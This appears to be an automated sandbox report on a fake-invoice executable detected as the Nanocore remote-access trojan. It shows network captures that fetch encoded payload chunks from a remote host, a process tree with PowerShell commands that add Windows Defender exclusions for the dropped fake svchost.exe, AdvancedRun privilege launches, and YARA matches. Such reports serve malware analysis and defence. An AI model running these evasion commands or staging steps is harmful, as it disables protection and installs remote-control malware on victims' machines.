Feb 23, 2021 15:31:25.705430031 CET	8363	IN	Data Raw: 53 48 53 58 56 53 55 58 53 56 55 4b 53 58 4b 53 58 67 53 67 66 53 48 53 48 53 48 53 58 56 53 55 48 53 56 55 4b 53 58 4b 53 58 67 53 67 66 53 48 53 48 53 48 53 58 56 53 74 66 53 56 55 4b 53 58 4b 53 58 56 53 67 66 53 58 56 53 56 56 77 53 56 55 4b Data Ascii: SHSXVSUXSVUKSXKSXgSgfSHSHSHSXVSUHSVUKSXKSXgSgfSHSHSHSXVStfSVUKSXKSXVSgfSXVSVVwSVUKSXKSXgSgQSHSHSHSXVSVHHSVUKSXKSXgSgQSHSHSHSXVSUHSVUKSXKSXgSgQSHSHSHSXVSUHSVUKSXKSXVSgQSXVSfKSVUKSXKSXgSgKSHSHSHSXVSUUSVUKSXKSXgSgKSHSHSHSXVStQSVUKSXKSXgSgKSHSHSHS
Feb 23, 2021 15:31:26.194781065 CET	9409	OUT	GET /base/320AB9634C12E7907B8FA24F3948BF4F.html HTTP/1.1 Host: coroloboxorozor.com
Feb 23, 2021 15:31:26.316340923 CET	9411	IN	HTTP/1.1 200 OK Date: Tue, 23 Feb 2021 14:31:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d462641f38890e68183dcd6962c945dcb1614090686; expires=Thu, 25-Mar-21 14:31:26 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax Last-Modified: Tue, 23 Feb 2021 00:43:17 GMT Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 0870e6671700009be54e87f000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=xBmmAOphK6e6ThMuA4f71B1EqTxGnVymuGd%2B4RVKsa5G%2FjN31PyiTip5s%2FXk84b3yQfB4ZA7DTBb%2BnRu4A8cmobNnMYjUPKm1hlM2qZZvFNJVTkj"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 6261a684fc019be5-AMS Data Raw: 33 32 38 35 0d 0a 3c 70 3e 58 74 53 4b 55 53 4b 56 53 56 4b 67 53 56 74 56 53 56 51 48 53 56 4b 67 53 56 55 66 53 55 67 53 67 74 51 53 66 77 53 51 48 53 67 74 51 53 58 51 53 56 77 67 53 55 55 53 56 74 56 53 58 55 53 4b 66 53 67 67 67 53 56 67 56 53 56 77 58 53 56 55 4b 53 56 55 56 53 56 66 53 67 48 48 53 56 58 74 53 51 55 53 56 67 4b 53 77 48 53 58 51 53 56 77 48 53 67 74 55 53 55 58 53 67 66 53 67 4b 53 77 74 53 56 74 58 53 77 51 53 58 56 53 67 67 56 53 56 74 51 53 56 58 4b 53 56 51 66 53 58 4b 53 56 77 58 53 66 66 53 56 67 55 53 56 74 51 53 56 48 4b 53 56 56 58 53 56 51 51 53 67 74 77 53 56 48 74 53 56 53 4b 66 53 56 4b 77 53 67 74 48 53 55 58 53 67 56 4b 53 66 55 53 74 77 53 67 67 66 53 56 56 56 53 66 53 56 58 56 53 67 56 48 53 56 56 56 53 56 48 48 53 56 56 77 53 56 51 4b 53 4b 48 53 67 67 48 53 56 56 53 51 74 53 56 56 74 53 51 55 53 56 67 74 53 56 77 51 53 56 48 77 53 56 51 55 53 56 58 58 53 56 67 56 53 56 51 74 53 56 74 48 53 56 77 74 53 67 56 58 53 56 48 4b 53 55 48 53 67 74 55 53 56 77 66 53 67 67 74 53 56 58 77 53 66 4b 53 48 53 56 66 67 53 67 48 48 53 56 67 58 53 67 48 53 56 77 51 53 67 48 48 53 51 58 53 56 51 48 53 56 67 77 53 56 58 66 53 67 67 74 53 56 67 55 53 56 4b 77 53 51 4b 53 56 67 4b 53 58 58 53 56 56 51 53 51 58 53 77 48 53 67 67 66 53 67 67 55 53 56 51 66 53 55 53 51 77 53 74 4b 53 67 56 77 53 67 67 56 53 67 67 74 53 67 58 53 56 66 53 56 67 53 51 4b 53 67 67 56 53 56 58 55 53 56 4b 4b 53 67 4b 53 67 48 51 53 56 55 77 53 56 66 56 53 67 74 4b 53 67 55 56 53 77 77 53 51 56 53 56 77 74 53 55 55 53 67 74 48 53 67 74 53 67 74 66 53 67 4b 53 56 67 67 53 56 58 48 53 67 74 56 Data Ascii: 3285<p>XtSKUSKVSVKgSVtVSVQHSVKgSVUfSUgSgtQSfwSQHSgtQSXQSVwgSUUSVtVSXUSKfSgggSVgVSVwXSVUKSVUVSVfSgHHSVXtSQUSVgKSwHSXQSVwHSgtUSUXSgfSgKSwtSVtXSwQSXVSggVSVtQSVXKSVQfSXKSVwXSffSVgUSVtQSVHKSVVXSVQQSgtwSVHtSVSKfSVKwSgtHSUXSgVKSfUStwSggfSVVVSfSVXVSgVHSVVVSVHHSVVwSVQKSKHSggHSVVSQtSVVtSQUSVgtSVwQSVHwSVQUSVXXSVgVSVQtSVtHSVwtSgVXSVHKSUHSgtUSVwfSggtSVXwSfKSHSVfgSgHHSVgXSgHSVwQSgHHSQXSVQHSVgwSVXfSggtSVgUSVKwSQKSVgKSXXSVVQSQXSwHSggfSggUSVQfSUSQwStKSgVwSggVSggtSgXSVfSVgSQKSggVSVXUSVKKSgKSgHQSVUwSVfVSgtKSgUVSwwSQVSVwtSUUSgtHSgtSgtfSgKSVggSVXHSgtV
Feb 23, 2021 15:31:26.553798914 CET	10471	OUT	GET /base/EFDD2E5486C74022C50C219C9576AB0D.html HTTP/1.1 Host: coroloboxorozor.com
Feb 23, 2021 15:31:26.655714989 CET	10472	IN	HTTP/1.1 200 OK Date: Tue, 23 Feb 2021 14:31:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d462641f38890e68183dcd6962c945dcb1614090686; expires=Thu, 25-Mar-21 14:31:26 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax last-modified: Tue, 23 Feb 2021 00:43:19 GMT vary: Accept-Encoding x-frame-options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 0870e6687f00009be54a848000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9bomtBVj8GEZrPe0JG8yPnhbHgAf6bA2bHCDLLfnK9DdKju6oSvONdz2vz2BdFklyMgitMTdAVNM9QjU6GNAbKa86lfwZmSYeKcEo6JiSLcAt4DR"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 6261a6873d3e9be5-AMS Data Raw: 66 66 64 0d 0a 3c 70 3e 55 74 53 48 53 55 55 53 48 53 74 66 53 48 53 48 53 58 4b 53 55 56 53 67 67 4b 53 4b 55 53 67 67 4b 53 51 58 53 67 67 4b 53 56 51 53 67 67 4b 53 56 77 53 67 67 4b 53 74 51 53 67 67 4b 53 77 51 53 67 67 4b 53 4b 51 53 67 67 4b 53 77 55 53 67 67 4b 53 77 56 53 67 67 4b 53 77 74 53 67 67 4b 53 58 56 53 67 67 4b 53 4b 55 53 67 67 4b 53 4b 74 53 67 67 4b 53 51 48 53 67 67 4b 53 77 55 53 67 67 4b 53 51 74 53 67 67 4b 53 51 48 53 67 67 4b 53 56 53 56 56 53 55 58 53 48 53 55 77 53 48 53 74 51 53 48 53 55 55 53 48 53 55 74 53 48 53 48 53 56 55 53 55 67 53 67 55 58 53 77 67 53 67 55 58 53 55 58 53 67 55 58 53 67 55 55 53 67 55 67 53 55 74 53 67 55 58 53 4b 58 53 67 55 58 53 55 74 53 67 55 58 53 56 53 56 56 53 55 74 53 48 53 55 67 53 48 53 55 55 53 48 53 55 48 53 48 53 74 66 53 48 53 48 53 67 55 53 67 4b 53 58 74 53 4b 66 53 58 74 53 56 67 53 58 74 53 66 77 53 58 74 53 51 55 53 58 74 53 51 66 53 58 74 53 51 56 53 58 74 53 66 56 53 58 74 53 66 4b 53 58 74 53 66 77 53 58 74 53 56 67 53 58 74 53 67 66 53 58 74 53 56 53 66 53 55 77 53 48 53 55 74 53 48 53 55 77 53 48 53 55 67 53 48 53 48 53 58 56 53 56 74 67 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 48 67 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 48 67 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 74 66 53 56 67 66 53 56 48 67 53 56 67 66 53 56 53 56 56 53 55 56 53 48 53 55 56 53 48 53 74 51 53 48 53 55 4b 53 48 53 55 67 53 48 53 48 53 58 56 53 56 56 53 56 4b 53 56 51 53 56 4b 53 56 55 53 56 Data Ascii: ffd<p>UtSHSUUSHStfSHSHSXKSUVSggKSKUSggKSQXSggKSVQSggKSVwSggKStQSggKSwQSggKSKQSggKSwUSggKSwVSggKSwtSggKSXVSggKSKUSggKSKtSggKSQHSggKSwUSggKSQtSggKSQHSggKSVSVVSUXSHSUwSHStQSHSUUSHSUtSHSHSVUSUgSgUXSwgSgUXSUXSgUXSgUUSgUgSUtSgUXSKXSgUXSUtSgUXSVSVVSUtSHSUgSHSUUSHSUHSHStfSHSHSgUSgKSXtSKfSXtSVgSXtSfwSXtSQUSXtSQfSXtSQVSXtSfVSXtSfKSXtSfwSXtSVgSXtSgfSXtSVSfSUwSHSUtSHSUwSHSUgSHSHSXVSVtgSVgfSVtfSVgfSVtwSVgfSVHgSVgfSVtfSVgfSVtwSVgfSVtfSVgfSVtwSVgfSVHgSVgfSVtfSVgfSVtwSVgfSVtfSVgfSVtwSVgfSVtfSVgfSVHgSVgfSVSVVSUVSHSUVSHStQSHSUKSHSUgSHSHSXVSVVSVKSVQSVKSVUSV

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: CN-Invoice-XXXXX9808-19011143287989.exe PID: 6200 Parent PID: 6004

General

Start time:	15:30:28
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe'
Imagebase:	0xd70000
File size:	634024 bytes
MD5 hash:	E9CD061B2286D8098153C9D9E2ED0B4B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 5888 Parent PID: 568

General

Start time:	15:30:39
Start date:	23/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 5864 Parent PID: 6200

General

Start time:	15:30:43
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
Imagebase:	0x20000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6740 Parent PID: 5864

General

Start time:	15:30:44
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: AdvancedRun.exe PID: 744 Parent PID: 6200

General

Start time:	15:30:45
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Imagebase:	0x400000
File size:	91000 bytes
MD5 hash:	17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: AdvancedRun.exe PID: 7016 Parent PID: 744

General

Start time:	15:30:47
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /SpecialRun 4101d8 744
Imagebase:	0x400000
File size:	91000 bytes
MD5 hash:	17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 7132 Parent PID: 3424

General

Start time:	15:30:52
Start date:	23/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 7060 Parent PID: 800

General

Start time:	15:30:54
Start date:	23/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 6992 Parent PID: 6200

General

Start time:	15:30:53
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
Imagebase:	0x20000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6764 Parent PID: 6992

General

Start time:	15:30:54
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4780 Parent PID: 6200

General

Start time:	15:30:54
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c timeout 1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4588 Parent PID: 4780

General

Start time:	15:30:54
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: timeout.exe PID: 4240 Parent PID: 4780

General

Start time:	15:30:55
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 1
Imagebase:	0x1250000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6140 Parent PID: 7060

General

Start time:	15:30:55
Start date:	23/02/2021
Path:	C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
Imagebase:	0x630000
File size:	634024 bytes
MD5 hash:	E9CD061B2286D8098153C9D9E2ED0B4B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 27%, ReversingLabs

Chronological Activities

Analysis Process: svchost.exe PID: 6020 Parent PID: 568

General

Start time:	15:30:56
Start date:	23/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: explorer.exe PID: 4876 Parent PID: 3424

General

Start time:	15:31:01
Start date:	23/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: explorer.exe PID: 6180 Parent PID: 800

General

Start time:	15:31:03
Start date:	23/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 7048 Parent PID: 568

General

Start time:	15:31:03
Start date:	23/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 3524 Parent PID: 6180

General

Start time:	15:31:05
Start date:	23/02/2021
Path:	C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
Imagebase:	0xf20000
File size:	634024 bytes
MD5 hash:	E9CD061B2286D8098153C9D9E2ED0B4B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: CasPol.exe PID: 4244 Parent PID: 6200

General

Start time:	15:31:07
Start date:	23/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Imagebase:	0x3c0000
File size:	107624 bytes
MD5 hash:	F866FC1C2E928779C7119353C3091F0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: CasPol.exe PID: 4928 Parent PID: 6200

General

Start time:	15:31:08
Start date:	23/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Imagebase:	0xe0000
File size:	107624 bytes
MD5 hash:	F866FC1C2E928779C7119353C3091F0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: CasPol.exe PID: 6880 Parent PID: 6200

General

Start time:	15:31:08
Start date:	23/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Imagebase:	0xa10000
File size:	107624 bytes
MD5 hash:	F866FC1C2E928779C7119353C3091F0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.948080441.0000000003121000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000002.956836071.0000000005460000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000019.00000002.956836071.0000000005460000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: svchost.exe PID: 5800 Parent PID: 568

General

Start time:	15:31:09
Start date:	23/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 1320 Parent PID: 5800

General

Start time:	15:31:10
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6200 -ip 6200
Imagebase:	0x12e0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 7040 Parent PID: 6200

General

Start time:	15:31:11
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 2152
Imagebase:	0x12e0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: svchost.exe PID: 6652 Parent PID: 568

General

Start time:	15:31:15
Start date:	23/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5588 Parent PID: 568

General

Start time:	15:31:29
Start date:	23/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 6996 Parent PID: 3524

General

Start time:	15:32:30
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
Imagebase:	0x20000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 7056 Parent PID: 6996

General

Start time:	15:32:30
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: AdvancedRun.exe PID: 744 Parent PID: 6200 AdvancedRun.exeCOMMON

Executed Functions

Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120
processlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
